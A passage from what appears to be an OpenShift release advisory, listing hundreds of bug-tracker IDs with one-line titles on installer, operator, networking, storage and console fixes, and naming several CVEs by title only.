reference(s)\",\"error\":\"referential integrity violation\n2045872 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt\n2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter\n2046133 - [MAPO]IPI proxy installation failed\n2046156 - Network policy: preview of affected pods for non-admin shows empty popup\n2046157 - Still uses pod-security.admission.config.k8s.io/v1alpha1 in admission plugin config\n2046191 - Opeartor pod is missing correct qosClass and priorityClass\n2046277 - openshift-installer intermittent failure on AWS with \"Error: Provider produced inconsistent result after apply\" when creating the module.vpc.aws_subnet.private_subnet[0] resource\n2046319 - oc debug cronjob command failed with error \"unable to extract pod template from type *v1.CronJob\". \n2046435 - Better Devfile Import Strategy support in the \u0027Import from Git\u0027 flow\n2046496 - Awkward wrapping of project toolbar on mobile\n2046497 - Re-enable TestMetricsEndpoint test case in console operator e2e tests\n2046498 - \"All Projects\" and \"all applications\" use different casing on topology page\n2046591 - Auto-update boot source is not available while create new template from it\n2046594 - \"Requested template could not be found\" while creating VM from user-created template\n2046598 - Auto-update boot source size unit is byte on customize wizard\n2046601 - Cannot create VM from template\n2046618 - Start last run action should contain current user name in the started-by annotation of the PLR\n2046662 - Should upgrade the go version to be 1.17 for example go operator memcached-operator\n2047197 - Sould upgrade the operator_sdk.util version to \"0.4.0\" for the \"osdk_metric\" module\n2047257 - [CP MIGRATION] Node drain failure during control plane node migration\n2047277 - Storage status is missing from status card of virtualization overview\n2047308 - Remove metrics and events for master port offsets\n2047310 - Running VMs per template card needs empty state when no VMs exist\n2047320 - New route annotation to show another URL or hide topology URL decorator doesn\u0027t work for Knative Services\n2047335 - \u0027oc get project\u0027 caused \u0027Observed a panic: cannot deep copy core.NamespacePhase\u0027 when AllRequestBodies is used\n2047362 - Removing prometheus UI access breaks origin test\n2047445 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure\n2047670 - Installer should pre-check that the hosted zone is not associated with the VPC and throw the error message. \n2047702 - Issue described on bug #2013528 reproduced: mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8\n2047710 - [OVN] ovn-dbchecker CrashLoopBackOff and sbdb jsonrpc unix socket receive error\n2047732 - [IBM]Volume is not deleted after destroy cluster\n2047741 - openshift-installer intermittent failure on AWS with \"Error: Provider produced inconsistent result after apply\" when creating the module.masters.aws_network_interface.master[1] resource\n2047790 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2047799 - release-openshift-ocp-installer-e2e-aws-upi-4.9\n2047870 - Prevent redundant queries of BIOS settings in HostFirmwareController\n2047895 - Fix architecture naming in oc adm release mirror for aarch64\n2047911 - e2e: Mock CSI tests fail on IBM ROKS clusters\n2047913 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]\n2047925 - [FJ OCP4.10 Bug]: IRONIC_KERNEL_PARAMS does not contain coreos_kernel_params during iPXE boot\n2047935 - [4.11] Bootimage bump tracker\n2047998 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-*\n2048059 - Service Level Agreement (SLA) always show \u0027Unknown\u0027\n2048067 - [IPI on Alibabacloud] \"Platform Provisioning Check\" tells \u0027\"ap-southeast-6\": enhanced NAT gateway is not supported\u0027, which seems false\n2048186 - Image registry operator panics when finalizes config deletion\n2048214 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud\n2048219 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool\n2048221 - Capitalization of titles in the VM details page is inconsistent. \n2048222 - [AWS GovCloud] Cluster can not be installed on AWS GovCloud regions via terminal interactive UI. \n2048276 - Cypress E2E tests fail due to a typo in test-cypress.sh\n2048333 - prometheus-adapter becomes inaccessible during rollout\n2048352 - [OVN] node does not recover after NetworkManager restart, NotReady and unreachable\n2048442 - [KMS] UI does not have option to specify kube auth path and namespace for cluster wide encryption\n2048451 - Custom serviceEndpoints in install-config are reported to be unreachable when environment uses a proxy\n2048538 - Network policies are not implemented or updated by OVN-Kubernetes\n2048541 - incorrect rbac check for install operator quick starts\n2048563 - Leader election conventions for cluster topology\n2048575 - IP reconciler cron job failing on single node\n2048686 - Check MAC address provided on the install-config.yaml file\n2048687 - All bare metal jobs are failing now due to End of Life of centos 8\n2048793 - Many Conformance tests are failing in OCP 4.10 with Kuryr\n2048803 - CRI-O seccomp profile out of date\n2048824 - [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class\n2048841 - [ovn] Missing lr-policy-list and snat rules for egressip when new pods are added\n2048955 - Alibaba Disk CSI Driver does not have CI\n2049073 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured\n2049078 - Bond CNI: Failed to attach Bond NAD to pod\n2049108 - openshift-installer intermittent failure on AWS with \u0027Error: Error waiting for NAT Gateway (nat-xxxxx) to become available\u0027\n2049117 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently\n2049133 - oc adm catalog mirror throws \u0027missing signature key\u0027 error when using file://local/index\n2049142 - Missing \"app\" label\n2049169 - oVirt CSI driver should use the trusted CA bundle when cluster proxy is configured\n2049234 - ImagePull fails with error \"unable to pull manifest from example.com/busy.box:v5 invalid reference format\"\n2049410 - external-dns-operator creates provider section, even when not requested\n2049483 - Sidepanel for Connectors/workloads in topology shows invalid tabs\n2049613 - MTU migration on SDN IPv4 causes API alerts\n2049671 - system:serviceaccount:openshift-cluster-csi-drivers:aws-ebs-csi-driver-operator trying to GET and DELETE /api/v1/namespaces/openshift-cluster-csi-drivers/configmaps/kube-cloud-config which does not exist\n2049687 - superfluous apirequestcount entries in audit log\n2049775 - cloud-provider-config change not applied when ExternalCloudProvider enabled\n2049787 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs\n2049832 - ContainerCreateError when trying to launch large (\u003e500) numbers of pods across nodes\n2049872 - cluster storage operator AWS credentialsrequest lacks KMS privileges\n2049889 - oc new-app --search nodejs warns about access to sample content on quay.io\n2050005 - Plugin module IDs can clash with console module IDs causing runtime errors\n2050011 - Observe \u003e Metrics page: Timespan text input and dropdown do not align\n2050120 - Missing metrics in kube-state-metrics\n2050146 - Installation on PSI fails with: \u0027openstack platform does not have the required standard-attr-tag network extension\u0027\n2050173 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0\n2050180 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2\n2050300 - panic in cluster-storage-operator while updating status\n2050332 - Malformed ClusterClaim lifetimes cause the clusterclaims-controller to silently fail to reconcile all clusterclaims\n2050335 - azure-disk failed to mount with error special device does not exist\n2050345 - alert data for burn budget needs to be updated to prevent regression\n2050407 - revert \"force cert rotation every couple days for development\" in 4.11\n2050409 - ip-reconcile job is failing consistently\n2050452 - Update osType and hardware version used by RHCOS OVA to indicate it is a RHEL 8 guest\n2050466 - machine config update with invalid container runtime config should be more robust\n2050637 - Blog Link not re-directing to the intented website in the last modal in the Dev Console Onboarding Tour\n2050698 - After upgrading the cluster the console still show 0 of N, 0% progress for worker nodes\n2050707 - up test for prometheus pod look to far in the past\n2050767 - Vsphere upi tries to access vsphere during manifests generation phase\n2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function\n2050882 - Crio appears to be coredumping in some scenarios\n2050902 - not all resources created during import have common labels\n2050946 - Cluster-version operator fails to notice TechPreviewNoUpgrade featureSet change after initialization-lookup error\n2051320 - Need to build ose-aws-efs-csi-driver-operator-bundle-container image for 4.11\n2051333 - [aws] records in public hosted zone and BYO private hosted zone were not deleted. \n2051377 - Unable to switch vfio-pci to netdevice in policy\n2051378 - Template wizard is crashed when there are no templates existing\n2051423 - migrate loadbalancers from amphora to ovn not working\n2051457 - [RFE] PDB for cloud-controller-manager to avoid going too many replicas down\n2051470 - prometheus: Add validations for relabel configs\n2051558 - RoleBinding in project without subject is causing \"Project access\" page to fail\n2051578 - Sort is broken for the Status and Version columns on the Cluster Settings \u003e ClusterOperators page\n2051583 - sriov must-gather image doesn\u0027t work\n2051593 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line\n2051611 - Remove Check which enforces summary_interval must match logSyncInterval\n2051642 - Remove \"Tech-Preview\" Label for the Web Terminal GA release\n2051657 - Remove \u0027Tech preview\u0027 from minnimal deployment Storage System creation\n2051718 - MetaLLB: Validation Webhook: BGPPeer hold time is allowed to be set to less than 3s\n2051722 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop\n2051881 - [vSphere CSI driver Operator] RWX volumes counts metrics `vsphere_rwx_volumes_total` not valid\n2051954 - Allow changing of policyAuditConfig ratelimit post-deployment\n2051969 - Need to build local-storage-operator-metadata-container image for 4.11\n2051985 - An APIRequestCount without dots in the name can cause a panic\n2052016 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set. \n2052034 - Can\u0027t start correct debug pod using pod definition yaml in OCP 4.8\n2052055 - Whereabouts should implement client-go 1.22+\n2052056 - Static pod installer should throttle creating new revisions\n2052071 - local storage operator metrics target down after upgrade\n2052095 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1\n2052270 - FSyncControllerDegraded has \"treshold\" -\u003e \"threshold\" typos\n2052309 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests\n2052332 - Probe failures and pod restarts during 4.7 to 4.8 upgrade\n2052393 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh\n2052398 - 4.9 to 4.10 upgrade fails for ovnkube-masters\n2052415 - Pod density test causing problems when using kube-burner\n2052513 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade. \n2052578 - Create new app from a private git repository using \u0027oc new app\u0027 with basic auth does not work. \n2052595 - Remove dev preview badge from IBM FlashSystem deployment windows\n2052618 - Node reboot causes duplicate persistent volumes\n2052671 - Add Sprint 214 translations\n2052674 - Remove extra spaces\n2052700 - kube-controller-manger should use configmap lease\n2052701 - kube-scheduler should use configmap lease\n2052814 - go fmt fails in OSM after migration to go 1.17\n2052840 - IMAGE_BUILDER=docker make test-e2e-operator-ocp runs with podman instead of docker\n2052953 - Observe dashboard always opens for last viewed workload instead of the selected one\n2052956 - Installing virtualization operator duplicates the first action on workloads in topology\n2052975 - High cpu load on Juniper Qfx5120 Network switches after upgrade to Openshift 4.8.26\n2052986 - Console crashes when Mid cycle hook in Recreate strategy(edit deployment/deploymentConfig) selects Lifecycle strategy as \"Tags the current image as an image stream tag if the deployment succeeds\"\n2053006 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11\n2053104 - [vSphere CSI driver Operator] hw_version_total metric update wrong value after upgrade nodes hardware version from `vmx-13` to `vmx-15`\n2053112 - nncp status is unknown when nnce is Progressing\n2053118 - nncp Available condition reason should be exposed in `oc get`\n2053168 - Ensure the core dynamic plugin SDK package has correct types and code\n2053205 - ci-openshift-cluster-network-operator-master-e2e-agnostic-upgrade is failing most of the time\n2053304 - Debug terminal no longer works in admin console\n2053312 - requestheader IDP test doesn\u0027t wait for cleanup, causing high failure rates\n2053334 - rhel worker scaleup playbook failed because missing some dependency of podman\n2053343 - Cluster Autoscaler not scaling down nodes which seem to qualify for scale-down\n2053491 - nmstate interprets interface names as float64 and subsequently crashes on state update\n2053501 - Git import detection does not happen for private repositories\n2053582 - inability to detect static lifecycle failure\n2053596 - [IBM Cloud] Storage IOPS limitations and lack of IPI ETCD deployment options trigger leader election during cluster initialization\n2053609 - LoadBalancer SCTP service leaves stale conntrack entry that causes issues if service is recreated\n2053622 - PDB warning alert when CR replica count is set to zero\n2053685 - Topology performance: Immutable .toJSON consumes a lot of CPU time when rendering a large topology graph (~100 nodes)\n2053721 - When using RootDeviceHint rotational setting the host can fail to provision\n2053922 - [OCP 4.8][OVN] pod interface: error while waiting on OVS.Interface.external-ids\n2054095 - [release-4.11] Gather images.conifg.openshift.io cluster resource definiition\n2054197 - The ProjectHelmChartRepositrory schema has merged but has not been initialized in the cluster yet\n2054200 - Custom created services in openshift-ingress removed even though the services are not of type LoadBalancer\n2054238 - console-master-e2e-gcp-console is broken\n2054254 - vSphere test failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]\n2054285 - Services other than knative service also shows as KSVC in add subscription/trigger modal\n2054319 - must-gather | gather_metallb_logs can\u0027t detect metallb pod\n2054351 - Rrestart of ptp4l/phc2sys on change of PTPConfig generates more than one times, socket error in event frame work\n2054385 - redhat-operatori ndex image build failed with AMQ brew build - amq-interconnect-operator-metadata-container-1.10.13\n2054564 - DPU network operator 4.10 branch need to sync with master\n2054630 - cancel create silence from kebab menu of alerts page will navigated to the previous page\n2054693 - Error deploying HorizontalPodAutoscaler with oc new-app command in OpenShift 4\n2054701 - [MAPO] Events are not created for MAPO machines\n2054705 - [tracker] nf_reinject calls nf_queue_entry_free on an already freed entry-\u003estate\n2054735 - Bad link in CNV console\n2054770 - IPI baremetal deployment metal3 pod crashes when using capital letters in hosts bootMACAddress\n2054787 - SRO controller goes to CrashLoopBackOff status when the pull-secret does not have the correct permissions\n2054950 - A large number is showing on disk size field\n2055305 - Thanos Querier high CPU and memory usage till OOM\n2055386 - MetalLB changes the shared external IP of a service upon updating the externalTrafficPolicy definition\n2055433 - Unable to create br-ex as gateway is not found\n2055470 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation\n2055492 - The default YAML on vm wizard is not latest\n2055601 - installer did not destroy *.app dns recored in a IPI on ASH install\n2055702 - Enable Serverless tests in CI\n2055723 - CCM operator doesn\u0027t deploy resources after enabling TechPreviewNoUpgrade feature set. \n2055729 - NodePerfCheck fires and stays active on momentary high latency\n2055814 - Custom dynamic exntension point causes runtime and compile time error\n2055861 - cronjob collect-profiles failed leads node reach to OutOfpods status\n2055980 - [dynamic SDK][internal] console plugin SDK does not support table actions\n2056454 - Implement preallocated disks for oVirt in the cluster API provider\n2056460 - Implement preallocated disks for oVirt in the OCP installer\n2056496 - If image does not exists for builder image then upload jar form crashes\n2056519 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies\n2056607 - Running kubernetes-nmstate handler e2e tests stuck on OVN clusters\n2056752 - Better to named the oc-mirror version info with more information like the `oc version --client`\n2056802 - \"enforcedLabelLimit|enforcedLabelNameLengthLimit|enforcedLabelValueLengthLimit\" do not take effect\n2056841 - [UI] [DR] Web console update is available pop-up is seen multiple times on Hub cluster where ODF operator is not installed and unnecessarily it pop-up on the Managed cluster as well where ODF operator is installed\n2056893 - incorrect warning for --to-image in oc adm upgrade help\n2056967 - MetalLB: speaker metrics is not updated when deleting a service\n2057025 - Resource requests for the init-config-reloader container of prometheus-k8s-* pods are too high\n2057054 - SDK: k8s methods resolves into Response instead of the Resource\n2057079 - [cluster-csi-snapshot-controller-operator] CI failure: events should not repeat pathologically\n2057101 - oc commands working with images print an incorrect and inappropriate warning\n2057160 - configure-ovs selects wrong interface on reboot\n2057183 - OperatorHub: Missing \"valid subscriptions\" filter\n2057251 - response code for Pod count graph changed from 422 to 200 periodically for about 30 minutes if pod is rescheduled\n2057358 - [Secondary Scheduler] - cannot build bundle index image using the secondary scheduler operator bundle\n2057387 - [Secondary Scheduler] - olm.skiprange, com.redhat.openshift.versions is incorrect and no minkubeversion\n2057403 - CMO logs show forbidden: User \"system:serviceaccount:openshift-monitoring:cluster-monitoring-operator\" cannot get resource \"replicasets\" in API group \"apps\" in the namespace \"openshift-monitoring\"\n2057495 - Alibaba Disk CSI driver does not provision small PVCs\n2057558 - Marketplace operator polls too frequently for cluster operator status changes\n2057633 - oc rsync reports misleading error when container is not found\n2057642 - ClusterOperator status.conditions[].reason \"etcd disk metrics exceeded...\" should be a CamelCase slug\n2057644 - FSyncControllerDegraded latches True, even after fsync latency recovers on all members\n2057696 - Removing console still blocks OCP install from completing\n2057762 - ingress operator should report Upgradeable False to remind user before upgrade to 4.10 when Non-SAN certs are used\n2057832 - expr for record rule: \"cluster:telemetry_selected_series:count\" is improper\n2057967 - KubeJobCompletion does not account for possible job states\n2057990 - Add extra debug information to image signature workflow test\n2057994 - SRIOV-CNI failed to load netconf: LoadConf(): failed to get VF information\n2058030 - On OCP 4.10+ using OVNK8s on BM IPI, nodes register as localhost.localdomain\n2058217 - [vsphere-problem-detector-operator] \u0027vsphere_rwx_volumes_total\u0027 metric name make confused\n2058225 - openshift_csi_share_* metrics are not found from telemeter server\n2058282 - Websockets stop updating during cluster upgrades\n2058291 - CI builds should have correct version of Kube without needing to push tags everytime\n2058368 - Openshift OVN-K got restarted mutilple times with the error \" ovsdb-server/memory-trim-on-compaction on\u0027\u0027 failed: exit status 1 and \" ovndbchecker.go:118] unable to turn on memory trimming for SB DB, stderr \" , cluster unavailable\n2058370 - e2e-aws-driver-toolkit CI job is failing\n2058421 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install\n2058424 - ConsolePlugin proxy always passes Authorization header even if `authorize` property is omitted or false\n2058623 - Bootstrap server dropdown menu in Create Event Source- KafkaSource form is empty even if it\u0027s created\n2058626 - Multiple Azure upstream kube fsgroupchangepolicy tests are permafailing expecting gid \"1000\" but geting \"root\"\n2058671 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage \u0026 proper backoff\n2058692 - [Secondary Scheduler] Creating secondaryscheduler instance fails with error \"key failed with : secondaryschedulers.operator.openshift.io \"secondary-scheduler\" not found\"\n2059187 - [Secondary Scheduler] - key failed with : serviceaccounts \"secondary-scheduler\" is forbidden\n2059212 - [tracker] Backport https://github.com/util-linux/util-linux/commit/eab90ef8d4f66394285e0cff1dfc0a27242c05aa\n2059213 - ART cannot build installer images due to missing terraform binaries for some architectures\n2059338 - A fully upgraded 4.10 cluster defaults to HW-13 hardware version even if HW-15 is default (and supported)\n2059490 - The operator image in CSV file of the ART DPU network operator bundle is incorrect\n2059567 - vMedia based IPI installation of OpenShift fails on Nokia servers due to issues with virtual media attachment and boot source override\n2059586 - (release-4.11) Insights operator doesn\u0027t reconcile clusteroperator status condition messages\n2059654 - Dynamic demo plugin proxy example out of date\n2059674 - Demo plugin fails to build\n2059716 - cloud-controller-manager flaps operator version during 4.9 -\u003e 4.10 update\n2059791 - [vSphere CSI driver Operator] didn\u0027t update \u0027vsphere_csi_driver_error\u0027 metric value when fixed the error manually\n2059840 - [LSO]Could not gather logs for pod diskmaker-discovery and diskmaker-manager\n2059943 - MetalLB: Move CI config files to metallb repo from dev-scripts repo\n2060037 - Configure logging level of FRR containers\n2060083 - CMO doesn\u0027t react to changes in clusteroperator console\n2060091 - CMO produces invalid alertmanager statefulset if console cluster .status.consoleURL is unset\n2060133 - [OVN RHEL upgrade] could not find IP addresses: failed to lookup link br-ex: Link not found\n2060147 - RHEL8 Workers Need to Ensure libseccomp is up to date at install time\n2060159 - LGW: External-\u003eService of type ETP=Cluster doesn\u0027t go to the node\n2060329 - Detect unsupported amount of workloads before rendering a lazy or crashing topology\n2060334 - Azure VNET lookup fails when the NIC subnet is in a different resource group\n2060361 - Unable to enumerate NICs due to missing the \u0027primary\u0027 field due to security restrictions\n2060406 - Test \u0027operators should not create watch channels very often\u0027 fails\n2060492 - Update PtpConfigSlave source-crs to use network_transport L2 instead of UDPv4\n2060509 - Incorrect installation of ibmcloud vpc csi driver in IBM Cloud ROKS 4.10\n2060532 - LSO e2e tests are run against default image and namespace\n2060534 - openshift-apiserver pod in crashloop due to unable to reach kubernetes svc ip\n2060549 - ErrorAddingLogicalPort: duplicate IP found in ECMP Pod route cache!\n2060553 - service domain can\u0027t be resolved when networkpolicy is used in OCP 4.10-rc\n2060583 - Remove Console internal-kubevirt plugin SDK package\n2060605 - Broken access to public images: Unable to connect to the server: no basic auth credentials\n2060617 - IBMCloud destroy DNS regex not strict enough\n2060687 - Azure Ci: SubscriptionDoesNotSupportZone - does not support availability zones at location \u0027westus\u0027\n2060697 - [AWS] partitionNumber cannot work for specifying Partition number\n2060714 - [DOCS] Change source_labels to sourceLabels in \"Configuring remote write storage\" section\n2060837 - [oc-mirror] Catalog merging error when two or more bundles does not have a set Replace field\n2060894 - Preceding/Trailing Whitespaces In Form Elements on the add page\n2060924 - Console white-screens while using debug terminal\n2060968 - Installation failing due to ironic-agent.service not starting properly\n2060970 - Bump recommended FCOS to 35.20220213.3.0\n2061002 - Conntrack entry is not removed for LoadBalancer IP\n2061301 - Traffic Splitting Dialog is Confusing With Only One Revision\n2061303 - Cachito request failure with vendor directory is out of sync with go.mod/go.sum\n2061304 - workload info gatherer - don\u0027t serialize empty images map\n2061333 - White screen for Pipeline builder page\n2061447 - [GSS] local pv\u0027s are in terminating state\n2061496 - etcd RecentBackup=Unknown ControllerStarted contains no message string\n2061527 - [IBMCloud] infrastructure asset missing CloudProviderType\n2061544 - AzureStack is hard-coded to use Standard_LRS for the disk type\n2061549 - AzureStack install with internal publishing does not create api DNS record\n2061611 - [upstream] The marker of KubeBuilder doesn\u0027t work if it is close to the code\n2061732 - Cinder CSI crashes when API is not available\n2061755 - Missing breadcrumb on the resource creation page\n2061833 - A single worker can be assigned to multiple baremetal hosts\n2061891 - [IPI on IBMCLOUD] missing ?br-sao? region in openshift installer\n2061916 - mixed ingress and egress policies can result in half-isolated pods\n2061918 - Topology Sidepanel style is broken\n2061919 - Egress Ip entry stays on node\u0027s primary NIC post deletion from hostsubnet\n2062007 - MCC bootstrap command lacks template flag\n2062126 - IPfailover pod is crashing during creation showing keepalived_script doesn\u0027t exist\n2062151 - Add RBAC for \u0027infrastructures\u0027 to operator bundle\n2062355 - kubernetes-nmstate resources and logs not included in must-gathers\n2062459 - Ingress pods scheduled on the same node\n2062524 - [Kamelet Sink] Topology crashes on click of Event sink node if the resource is created source to Uri over ref\n2062558 - Egress IP with openshift sdn in not functional on worker node. \n2062568 - CVO does not trigger new upgrade again after fail to update to unavailable payload\n2062645 - configure-ovs: don\u0027t restart networking if not necessary\n2062713 - Special Resource Operator(SRO) - No sro_used_nodes metric\n2062849 - hw event proxy is not binding on ipv6 local address\n2062920 - Project selector is too tall with only a few projects\n2062998 - AWS GovCloud regions are recognized as the unknown regions\n2063047 - Configuring a full-path query log file in CMO breaks Prometheus with the latest version of the operator\n2063115 - ose-aws-efs-csi-driver has invalid dependency in go.mod\n2063164 - metal-ipi-ovn-ipv6 Job Permafailing and Blocking OpenShift 4.11 Payloads: insights operator is not available\n2063183 - DefragDialTimeout is set to low for large scale OpenShift Container Platform - Cluster\n2063194 - cluster-autoscaler-default will fail when automated etcd defrag is running on large scale OpenShift Container Platform 4 - Cluster\n2063321 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs\n2063324 - MCO template output directories created with wrong mode causing render failure in unprivileged container environments\n2063375 - ptp operator upgrade from 4.9 to 4.10 stuck at pending due to service account requirements not met\n2063414 - on OKD 4.10, when image-registry is enabled, the /etc/hosts entry is missing on some nodes\n2063699 - Builds - Builds - Logs: i18n misses. \n2063708 - Builds - Builds - Logs: translation correction needed. \n2063720 - Metallb EBGP neighbor stuck in active until adding ebgp-multihop (directly connected neighbors)\n2063732 - Workloads - StatefulSets : I18n misses\n2063747 - When building a bundle, the push command fails because is passes a redundant \"IMG=\" on the the CLI\n2063753 - User Preferences - Language - Language selection : Page refresh rquired to change the UI into selected Language. \n2063756 - User Preferences - Applications - Insecure traffic : i18n misses\n2063795 - Remove go-ovirt-client go.mod replace directive\n2063829 - During an IPI install with the 4.10.4 installer on vSphere, getting \"Check\": platform.vsphere.network: Invalid value: \"VLAN_3912\": unable to find network provided\"\n2063831 - etcd quorum pods landing on same node\n2063897 - Community tasks not shown in pipeline builder page\n2063905 - PrometheusOperatorWatchErrors alert may fire shortly in case of transient errors from the API server\n2063938 - sing the hard coded rest-mapper in library-go\n2063955 - cannot download operator catalogs due to missing images\n2063957 - User Management - Users : While Impersonating user, UI is not switching into user\u0027s set language\n2064024 - SNO OCP upgrade with DU workload stuck at waiting for kube-apiserver static pod\n2064170 - [Azure] Missing punctuation in the installconfig.controlPlane.platform.azure.osDisk explain\n2064239 - Virtualization Overview page turns into blank page\n2064256 - The Knative traffic distribution doesn\u0027t update percentage in sidebar\n2064553 - UI should prefer to use the virtio-win configmap than v2v-vmware configmap for windows creation\n2064596 - Fix the hubUrl docs link in pipeline quicksearch modal\n2064607 - Pipeline builder makes too many (100+) API calls upfront\n2064613 - [OCPonRHV]- after few days that cluster is alive we got error in storage operator\n2064693 - [IPI][OSP] Openshift-install fails to find the shiftstack cloud defined in clouds.yaml in the current directory\n2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server\n2064705 - the alertmanagerconfig validation catches the wrong value for invalid field\n2064744 - Errors trying to use the Debug Container feature\n2064984 - Update error message for label limits\n2065076 - Access monitoring Routes based on monitoring-shared-config creates wrong URL\n2065160 - Possible leak of load balancer targets on AWS Machine API Provider\n2065224 - Configuration for cloudFront in image-registry operator configuration is ignored \u0026 duration is corrupted\n2065290 - CVE-2021-23648 sanitize-url: XSS\n2065338 - VolumeSnapshot creation date sorting is broken\n2065507 - `oc adm upgrade` should return ReleaseAccepted condition to show upgrade status. \n2065510 - [AWS] failed to create cluster on ap-southeast-3\n2065513 - Dev Perspective -\u003e Project Dashboard shows Resource Quotas which are a bit misleading, and too many decimal places\n2065547 - (release-4.11) Gather kube-controller-manager pod logs with garbage collector errors\n2065552 - [AWS] Failed to install cluster on AWS ap-southeast-3 region due to image-registry panic error\n2065577 - user with user-workload-monitoring-config-edit role can not create user-workload-monitoring-config configmap\n2065597 - Cinder CSI is not configurable\n2065682 - Remote write relabel config adds label __tmp_openshift_cluster_id__ to all metrics\n2065689 - Internal Image registry with GCS backend does not redirect client\n2065749 - Kubelet slowly leaking memory and pods eventually unable to start\n2065785 - ip-reconciler job does not complete, halts node drain\n2065804 - Console backend check for Web Terminal Operator incorrectly returns HTTP 204\n2065806 - stop considering Mint mode as supported on Azure\n2065840 - the cronjob object is created with a wrong api version batch/v1beta1 when created via the openshift console\n2065893 - [4.11] Bootimage bump tracker\n2066009 - CVE-2021-44906 minimist: prototype pollution\n2066232 - e2e-aws-workers-rhel8 is failing on ansible check\n2066418 - [4.11] Update channels information link is taking to a 404 error page\n2066444 - The \"ingress\" clusteroperator\u0027s relatedObjects field has kind names instead of resource names\n2066457 - Prometheus CI failure: 503 Service Unavailable\n2066463 - [IBMCloud] failed to list DNS zones: Exactly one of ApiKey or RefreshToken must be specified\n2066605 - coredns template block matches cluster API to loose\n2066615 - Downstream OSDK still use upstream image for Hybird type operator\n2066619 - The GitCommit of the `oc-mirror version` is not correct\n2066665 - [ibm-vpc-block] Unable to change default storage class\n2066700 - [node-tuning-operator] - Minimize wildcard/privilege Usage in Cluster and Local Roles\n2066754 - Cypress reports for core tests are not captured\n2066782 - Attached disk keeps in loading status when add disk to a power off VM by non-privileged user\n2066865 - Flaky test: In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (delayed binding)] topology should provision a volume and schedule a pod with AllowedTopologies\n2066886 - openshift-apiserver pods never going NotReady\n2066887 - Dependabot alert: Path traversal in github.com/valyala/fasthttp\n2066889 - Dependabot alert: Path traversal in github.com/valyala/fasthttp\n2066923 - No rule to make target \u0027docker-push\u0027 when building the SRO bundle\n2066945 - SRO appends \"arm64\" instead of \"aarch64\" to the kernel name and it doesn\u0027t match the DTK\n2067004 - CMO contains grafana image though grafana is removed\n2067005 - Prometheus rule contains grafana though grafana is removed\n2067062 - should update prometheus-operator resources version\n2067064 - RoleBinding in Developer Console is dropping all subjects when editing\n2067155 - Incorrect operator display name shown in pipelines quickstart in devconsole\n2067180 - Missing i18n translations\n2067298 - Console 4.10 operand form refresh\n2067312 - PPT event source is lost when received by the consumer\n2067384 - OCP 4.10 should be firing APIRemovedInNextEUSReleaseInUse for APIs removed in 1.25\n2067456 - OCP 4.11 should be firing APIRemovedInNextEUSReleaseInUse and APIRemovedInNextReleaseInUse for APIs removed in 1.25\n2067995 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling\n2068115 - resource tab extension fails to show up\n2068148 - [4.11] /etc/redhat-release symlink is broken\n2068180 - OCP UPI on AWS with STS enabled is breaking the Ingress operator\n2068181 - Event source powered with kamelet type source doesn\u0027t show associated deployment in resources tab\n2068490 - OLM descriptors integration test failing\n2068538 - Crashloop back-off popover visual spacing defects\n2068601 - Potential etcd inconsistent revision and data occurs\n2068613 - ClusterRoleUpdated/ClusterRoleBindingUpdated Spamming Event Logs\n2068908 - Manual blog link change needed\n2069068 - reconciling Prometheus Operator Deployment failed while upgrading from 4.7.46 to 4.8.35\n2069075 - [Alibaba 4.11.0-0.nightly] cluster storage component in Progressing state\n2069181 - Disabling community tasks is not working\n2069198 - Flaky CI test in e2e/pipeline-ci\n2069307 - oc mirror hangs when processing the Red Hat 4.10 catalog\n2069312 - extend rest mappings with \u0027job\u0027 definition\n2069457 - Ingress operator has superfluous finalizer deletion logic for LoadBalancer-type services\n2069577 - ConsolePlugin example proxy authorize is wrong\n2069612 - Special Resource Operator (SRO) - Crash when nodeSelector does not match any nodes\n2069632 - Not able to download previous container logs from console\n2069643 - ConfigMaps leftovers while uninstalling SpecialResource with configmap\n2069654 - Creating VMs with YAML on Openshift Virtualization UI is missing labels `flavor`, `os` and `workload`\n2069685 - UI crashes on load if a pinned resource model does not exist\n2069705 - prometheus target \"serviceMonitor/openshift-metallb-system/monitor-metallb-controller/0\" has a failure with \"server returned HTTP status 502 Bad Gateway\"\n2069740 - On-prem loadbalancer ports conflict with kube node port range\n2069760 - In developer perspective divider does not show up in navigation\n2069904 - Sync upstream 1.18.1 downstream\n2069914 - Application Launcher groupings are not 